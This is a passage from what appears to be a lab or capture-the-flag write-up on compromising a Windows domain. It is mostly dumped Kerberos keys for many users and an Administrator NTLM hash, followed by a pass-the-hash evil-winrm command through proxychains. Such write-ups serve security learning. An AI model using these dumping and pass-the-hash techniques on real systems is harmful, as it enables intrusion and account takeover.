huanggang:aes128-cts-hmac-sha1-96:91039de3cbdeee790ecaac5067d47566
huanggang:des-cbc-md5:86a17adf6bad9b8f
machao:aes256-cts-hmac-sha1-96:850f91e3ffd9d79d803a3a23e28a5308e471d954a6018bffbaf7a44c680e11d0
machao:aes128-cts-hmac-sha1-96:edf47b1011a703e69df2e35b6a2201f7
machao:des-cbc-md5:b50dd0ae4fb52619
liguihua:aes256-cts-hmac-sha1-96:bcb1317ad7701a68c8d5f1f5d8b66522b4aa2b7406cb6e401d8d97a8d75979d8
liguihua:aes128-cts-hmac-sha1-96:2c6b6bf4e88d5b3872dbcb390372bc3d
liguihua:des-cbc-md5:68dc9e8591298c2c
wangfang:aes256-cts-hmac-sha1-96:aa8e2a28614728b293c3a3dc124942228b5f75c4ff006f57bfe2edbcd9b6c409
wangfang:aes128-cts-hmac-sha1-96:24e9e3c145dea8399bd42466105c1298
wangfang:des-cbc-md5:4fd32904c2cdfbad
liguizhi:aes256-cts-hmac-sha1-96:9e8e1024cb004343e5988ed4b5ebf9530bd2373ec02569f25992a205c9209a11
liguizhi:aes128-cts-hmac-sha1-96:354350b841cb28956f4d004645c2ee83
liguizhi:des-cbc-md5:daa22a027c3e205e
wangyulan:aes256-cts-hmac-sha1-96:0d4a8d53bea31df593d42e4687e79635adf1260d2a0d71b05bb2e04466d01e6d
wangyulan:aes128-cts-hmac-sha1-96:bc222459b9e2ab8b43c18dbfff6973a7
wangyulan:des-cbc-md5:898a495258f264bf
huachunmei:aes256-cts-hmac-sha1-96:1211b996ab19e3e795177d07d01a8c7f19e8018ddd80aafaa468f232e5a698e3
huachunmei:aes128-cts-hmac-sha1-96:125cccce2e74f5d74ec510b6a350e3f1
huachunmei:des-cbc-md5:86e92a15807a4c79
jiadongmei:aes256-cts-hmac-sha1-96:ffff95cfb208f879f9b2068a0c8b08cdd60639e6b9f703ceec8a5b0c2ccc4334
jiadongmei:aes128-cts-hmac-sha1-96:d8d36b6ab86f147c82c56d7d65663617
jiadongmei:des-cbc-md5:fbfd57619bb9fdf7
liguilan:aes256-cts-hmac-sha1-96:7d32d8c89be54ab71d4e7639e978ef785d45d4fa4fb24afad21692198610ea05
liguilan:aes128-cts-hmac-sha1-96:fa8ac7ca3813c7731b1f2fc9253a0cb9
liguilan:des-cbc-md5:89b03efb86b9df49
yuxuecheng:aes256-cts-hmac-sha1-96:433edf2a97d3157630073e2b08a65c27e826df63440f4d0721857f7d3c74969a
yuxuecheng:aes128-cts-hmac-sha1-96:5e69c8750664229d1ed4a2c309f1f445
yuxuecheng:des-cbc-md5:d57502da7cfdc715
lixiuying:aes256-cts-hmac-sha1-96:8dc409b74c936f88ff977d5c7c17b5923e7c9d2129181b332a372fbf851ae6b6
lixiuying:aes128-cts-hmac-sha1-96:7731bc096f07aa3fc59fb79334f84a3c
lixiuying:des-cbc-md5:f4efd652bffd38c2
liguizhen:aes256-cts-hmac-sha1-96:69e5444825707d32c47086a0960addf5fe852c615aa1d33068fe767e2d586db7
liguizhen:aes128-cts-hmac-sha1-96:acbbd817ea86423eb2f057a099539a01
liguizhen:des-cbc-md5:2a67ceae91ae62ae
chenjianhua:aes256-cts-hmac-sha1-96:f0924fc23af017ce6564b3cc1cd9fabd05fe5b5d8be129be5df65133943f0470
chenjianhua:aes128-cts-hmac-sha1-96:d1c0724b5498230ed579d769676cde56
chenjianhua:des-cbc-md5:b3d68ad93e6151fe
yangjuan:aes256-cts-hmac-sha1-96:43d37ef5df5d3330b632b12e2829fc447ab0516ea220b6a9856bed989457086f
yangjuan:aes128-cts-hmac-sha1-96:2005c468b32775081cc37652cb96ecda
yangjuan:des-cbc-md5:940e98e3510d0d1f
lidan:aes256-cts-hmac-sha1-96:5573faaba91091eca180b3bd85af973dea9376b8c61ac3f95927e4a9d42bb64b
lidan:aes128-cts-hmac-sha1-96:6ca7b107e36c69573a2145ac18a32aab
lidan:des-cbc-md5:c1c740bca81a01c4
liyang:aes256-cts-hmac-sha1-96:368c633291007799691c311cd51f075b23daf7404fdaf846c4ef578fd65af2ff
liyang:aes128-cts-hmac-sha1-96:6d254393e532337391ed5bf0f28bd8b0
liyang:des-cbc-md5:baa13b32e3ae0e4f
zhaojun:aes256-cts-hmac-sha1-96:0d64e2fd344b63bbfddf3bd7a59090ccf5164e15178b2016b55a1e750d312524
zhaojun:aes128-cts-hmac-sha1-96:545fdb088d59961732860089791831ab
zhaojun:des-cbc-md5:2cad52ab57b69185
chenxin:aes256-cts-hmac-sha1-96:632e0ad6d26bd68e155f5f41c4221706f54f8e05998932626bccb795fdc7c51d
chenxin:aes128-cts-hmac-sha1-96:27bb7eabfc84cfe3ef31c7a9ac82d5f2
chenxin:des-cbc-md5:f12f6b077c9e5286
chenfei:aes256-cts-hmac-sha1-96:8653f8a0c80d9b00fc7de8954bf7412354cc68ec1646359edca95d25ad0a88d1
chenfei:aes128-cts-hmac-sha1-96:d50fc4b371bb48d6c514c99a9fe22a12
chenfei:des-cbc-md5:45ce29800e0bec38
chenhao:aes256-cts-hmac-sha1-96:244b7e6dcf52043cbcef620af6e2de7473626b28ec661ec76afd385ac18de271
chenhao:aes128-cts-hmac-sha1-96:adc33c162098184ac781947c4cc52424
chenhao:des-cbc-md5:8945e9feef9bb95e
lifei:aes256-cts-hmac-sha1-96:ae7363ebdeba1e7304f0f8cbee97fc11b65989d90669a21ad9534ffa99307609
lifei:aes128-cts-hmac-sha1-96:3f8d5b322c3ab7bc868bb0bdcc1941d5
lifei:des-cbc-md5:9843d568238f2ca4
zhangfang:aes256-cts-hmac-sha1-96:13149438681fe298dbdc3195933b0d12b520fdc19beed12ccdd759b2876ec473
zhangfang:aes128-cts-hmac-sha1-96:87c2f2db0c8f52c38eb716322233aaa3
zhangfang:des-cbc-md5:31e39e23df375efd
zhangkun:aes256-cts-hmac-sha1-96:6a92de23b62a7a981372f25862cb15f4754c30bf5621f220c9ea0b614ef5f6e3
zhangkun:aes128-cts-hmac-sha1-96:a6de080a2379a63d32a83b68664a9d1e
zhangkun:des-cbc-md5:2f2964df6ea8a4fb
yanglei:aes256-cts-hmac-sha1-96:b2e73d98dd93709436341867ae798817666464bd845c78aaa8ae1a8ec9dd384c
yanglei:aes128-cts-hmac-sha1-96:4e36c64295765d639cf726c4d288a1c3
yanglei:des-cbc-md5:c8642316cdf2c4f7
chenxia:aes256-cts-hmac-sha1-96:c808029491533d77785b1f8524e793a258a360bb32d18fc2fb092bf2b6e5e4ae
chenxia:aes128-cts-hmac-sha1-96:58cb554bd6965ce5ede4f162b71f3114
chenxia:des-cbc-md5:7057133d688938e6
zhangkai:aes256-cts-hmac-sha1-96:266d5fac40d3d0eb98756a8f1d3989f73deb7b828814ee444940dd035ef8b469
zhangkai:aes128-cts-hmac-sha1-96:994ed7ddbc91fb11daa4871c050e7479
zhangkai:des-cbc-md5:9d512919518a1c76
liuyu:aes256-cts-hmac-sha1-96:c8f33c45558655ac14720066270be7c7c6b39f7e51e23c920e3dc002a560fb36
liuyu:aes128-cts-hmac-sha1-96:d3ed22d7212aae06ecd66d3329d7436b
liuyu:des-cbc-md5:7002bac25b79494a
chenming:aes256-cts-hmac-sha1-96:a105587d48671d737f2b157387801fa5cdc8ae6f71d7a001d2a5c8aabc527a5e
chenming:aes128-cts-hmac-sha1-96:485a8993fd4158e5cbe15f7c9d0b5ba0
chenming:des-cbc-md5:d3793db004efe589
mali:aes256-cts-hmac-sha1-96:b9aa8e0a378585ca77bdcc237fdec9772f8926ade0f2484ec57c5a3ad77be4ad
mali:aes128-cts-hmac-sha1-96:96c881437be8422c98876f77bcd17f8f
mali:des-cbc-md5:6783da3145a80870
chengang:aes256-cts-hmac-sha1-96:189cef2f3df1b20e67a47bbc52e47fe5a3fa135b7a179921db75a23add12491e
chengang:aes128-cts-hmac-sha1-96:8989abbab9dd4d6c592f44843d144ed1
chengang:des-cbc-md5:8c7a86dc70d93e83
huangwei:aes256-cts-hmac-sha1-96:47409c2356a5b4b35f47a2c094129806687dbf5d371fecaabd306d0d6a6a7a7c
huangwei:aes128-cts-hmac-sha1-96:18a6b14982eaf1632550dca3553e786c
huangwei:des-cbc-md5:7a8abf32ae678652
lixia:aes256-cts-hmac-sha1-96:71990bae8e42d7afb988fd8c085192b62117b929bc632514b26067c81a408071
lixia:aes128-cts-hmac-sha1-96:67e54c4fd23d21f466c2d221f059bfcb
lixia:des-cbc-md5:263449465edc946e
xujing:aes256-cts-hmac-sha1-96:02e1509264194ced75b98f79967461e7780df97195f60474f4200c473588ed57
xujing:aes128-cts-hmac-sha1-96:30e97e50335033cafa9778e493567b24
xujing:des-cbc-md5:6dd56780f4579dc7
zhangjuan:aes256-cts-hmac-sha1-96:a469ff2fd19f472f1dfe1e301c44e44c8ceae2a9df065b29ee929f85dbaa8c5d
zhangjuan:aes128-cts-hmac-sha1-96:6c0bad8269b7460b9255f1ef26f9cb64
zhangjuan:des-cbc-md5:e962498fb90e757a
chenhui:aes256-cts-hmac-sha1-96:8456a5c089d601092a3eb142d1a8b6fa391e6fa707985da0f5a6d9512aa2f0a5
chenhui:aes128-cts-hmac-sha1-96:85ae6b41314586a7aef3dbcd443400c0
chenhui:des-cbc-md5:940e839464d06d58
liying:aes256-cts-hmac-sha1-96:4269ed8cd2c11584b0b67188a36b97fcc4a2e39bc4ba1f0ae3ab45329da2cd6a
liying:aes128-cts-hmac-sha1-96:778adcb89c1b1b82409623deb5af003b
liying:des-cbc-md5:a743a743c11f10ba
zhaoli:aes256-cts-hmac-sha1-96:dd9304d96d8cd2bbabada50ea482f4206ceba309590727771a8d57ef9a06a236
zhaoli:aes128-cts-hmac-sha1-96:d11d14a4ed03bfdb42ecf3cbd565b71b
zhaoli:des-cbc-md5:58ce9179fee6f1ad
zhoujing:aes256-cts-hmac-sha1-96:bf1237d53687578f0097bf7d92da3791bb59510d5bbd5fba3a34b612393042d3
zhoujing:aes128-cts-hmac-sha1-96:ddebd80f19a091b0c5db58bbd5de7d09
zhoujing:des-cbc-md5:9edff1017c023e7c
zhaoyong:aes256-cts-hmac-sha1-96:bc9c259cb28f85122cd973471c6c673bde03b9927a2058fbd112e01bd9509e39
zhaoyong:aes128-cts-hmac-sha1-96:b3be655b130bfdc1a5ae611544a7d74e
zhaoyong:des-cbc-md5:daa19192a78fc8fd
wangyu:aes256-cts-hmac-sha1-96:2e6969f11503f5dc619603395a56d541711ef621fe966a6ae9564e814d6db35d
wangyu:aes128-cts-hmac-sha1-96:4d2c21bcef8f3f234c23c9cfdb8d36cb
wangyu:des-cbc-md5:5e5dbc57ec0d6892
yangli:aes256-cts-hmac-sha1-96:fd2c88aa981430b7b57087878426f9aa33685bfb63889e512a7523e9e7b7e5ad
yangli:aes128-cts-hmac-sha1-96:b1d07abe126fc688e5fd5d0954a0f5a5
yangli:des-cbc-md5:8cc85eb55213df80
yangliu:aes256-cts-hmac-sha1-96:502f8f06819d4ca123bf0df2369bc01e39b10beaae9736bb89abd84aed191fda
yangliu:aes128-cts-hmac-sha1-96:b85b63efbafc11c81c903fbed1dacfe1
yangliu:des-cbc-md5:d0e6ec61d398c7a7
wangying:aes256-cts-hmac-sha1-96:21e7193624de64b091a50e40d237b7f7b95d98906c93361e668e1549a09964a6
wangying:aes128-cts-hmac-sha1-96:34559e58805b50fe63bd5b961b5e2781
wangying:des-cbc-md5:c198fe298023adb3
chenjie:aes256-cts-hmac-sha1-96:97f92bb027a23aa3e6c2f6f1e3be29b55ddae5894eec1b7bb64a2f404178f82f
chenjie:aes128-cts-hmac-sha1-96:246586d92c3a2112abdb78f6be6426fb
chenjie:des-cbc-md5:4ae9757f4346ae6e
yangyong:aes256-cts-hmac-sha1-96:a10d5f57e67555b38c94130eb639bfc1f3b5677eac62092ba23617fa15db0920
yangyong:aes128-cts-hmac-sha1-96:85bc63a86588f89b3d2130fde972814a
yangyong:des-cbc-md5:649140daa754e034
lixin:aes256-cts-hmac-sha1-96:5193d0c97992d131cf3e1daf9663d21c41b59c24df5f9800989e75d6cec2c026
lixin:aes128-cts-hmac-sha1-96:08bb58e1e3c1768a3938c1dde3fabcfb
lixin:des-cbc-md5:dc7a768945a8856d
zhanghui:aes256-cts-hmac-sha1-96:28c0a77a1889fbfbe41516244c96fb374558f3ed3edf9432d131470513d1e166
zhanghui:aes128-cts-hmac-sha1-96:7c928a8e82893e033fda12414479f5e9
zhanghui:des-cbc-md5:10baad3e9d708397
chenlin:aes256-cts-hmac-sha1-96:0501a62dd2b81829e06b4d02104541280730a1e6b0016f7fea9f1d7607342eb9
chenlin:aes128-cts-hmac-sha1-96:8666d30a719f44d7982835ae67af6936
chenlin:des-cbc-md5:d30ea8c180549d2a
chenjuan:aes256-cts-hmac-sha1-96:04cf01b384731d37fd48560e80f9d6f165c975f4023397c70e57483fccda3c80
chenjuan:aes128-cts-hmac-sha1-96:fbdee824097b2bb693c11f4c52134ca5
chenjuan:des-cbc-md5:fbb3b35ed0d96797
chenchen:aes256-cts-hmac-sha1-96:16250fd1a2d3ae95b67e57a8acc6f435faec821b61cedd21bc27c8c7ede16196
chenchen:aes128-cts-hmac-sha1-96:af6d75b3fef90e2c6e61e293de29bc84
chenchen:des-cbc-md5:f78319b9a2da5445
wangbing:aes256-cts-hmac-sha1-96:491d52f25c8ab1285b311334aa18ac3a49c4caf2c49364f5d20ef0cf3267b752
wangbing:aes128-cts-hmac-sha1-96:944ef5275279bc9ff350912313680a3e
wangbing:des-cbc-md5:c86273856dea3e92
chenling:aes256-cts-hmac-sha1-96:8ca2fa002a4fac085e9843e1fee471fbf216352c15c160eaa9a8e248359ba08f
chenling:aes128-cts-hmac-sha1-96:1f9dcffdd9cb633d7473c8ad9dbc0979
chenling:des-cbc-md5:57a7ead0f204949b
yangmei:aes256-cts-hmac-sha1-96:7fe6a96f3ea8521ac38c8d9a6afbb63432d09837d3edb65e328b5b42524ba4d3
yangmei:aes128-cts-hmac-sha1-96:5784edf9af99c8f4b11d477ac467e581
yangmei:des-cbc-md5:6d40859286b6c285
tiangui:aes256-cts-hmac-sha1-96:ea973d77cb1e7553eebf74f252f6e65d3ded442a2e903882130a891b0857ae5c
tiangui:aes128-cts-hmac-sha1-96:4b0540f9f84c834834b7630ba572b161
tiangui:des-cbc-md5:57bf1c150bf4163b
tianwen:aes256-cts-hmac-sha1-96:0d50bde0354833c30284bb4e5105fe6efde9a6d394492c17ebad628abda6a120
tianwen:aes128-cts-hmac-sha1-96:623189263738cd93d353cc69ed901587
tianwen:des-cbc-md5:e0f18f37293b4a46
tianshengli:aes256-cts-hmac-sha1-96:86dd2340322e692dc84a55b58a071193c61aa9f42ccb5313b1e9faea32901a17
tianshengli:aes128-cts-hmac-sha1-96:a48d66d1a413fbac7a84dd8b36f0018d
tianshengli:des-cbc-md5:3b5b76839b15b691
tianshi:aes256-cts-hmac-sha1-96:42a569ceee74f3ffeed1ec3660e38240154ec993d3dced11210ed9fd4c2ffcd3
tianshi:aes128-cts-hmac-sha1-96:38cd8b41da38afbade0a00993f4d7bbb
tianshi:des-cbc-md5:49d0c4d93861732f
tianlong:aes256-cts-hmac-sha1-96:d1ce4031b5d242c4e6e24831e69dd78147eb7ade76e2cda79459ee10e77e5477
tianlong:aes128-cts-hmac-sha1-96:860569a4d25b4649055da07b96d2e41f
tianlong:des-cbc-md5:e9464389858c0ba1
[*] Cleaning up... 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::

拿到域管哈希之后,直接登录域管即可

proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

image-20231007011202665